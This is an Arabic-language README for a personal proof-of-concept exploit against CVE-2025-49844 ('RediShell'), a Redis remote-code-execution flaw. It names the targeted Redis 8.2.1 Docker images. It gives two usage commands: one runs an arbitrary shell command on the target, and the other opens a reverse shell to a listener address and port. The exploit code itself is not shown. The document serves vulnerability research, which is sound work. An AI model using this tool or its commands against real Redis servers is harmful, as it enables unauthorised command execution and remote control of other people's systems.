
إثبات المفهوم لـ CVE-2025-49844
إثبات المفهوم الشخصي الخاص بي لـ CVE-2025-49844، المعروف أيضًا باسم RediShell.
الإصدارات المستهدفة المدعومة:
redis:8.2.1-alpine لنظام Linux بمعمارية x86-64redis:8.2.1-bookworm لنظام Linux بمعمارية x86-64إنه أخرق بعض الشيء، وربما ليس بنفس جودة نسخة Wiz Research. ومع ذلك، أنا سعيد لأنني تمكنت من جعله يعمل قبل رفع محاضرات Hexacon 2025، وقد استمتعت كثيرًا بالتحقيق فيه.
تشغيل أوامر shell أحادية الاتجاه:
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"
الاتصال بقشرة عكسية:
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444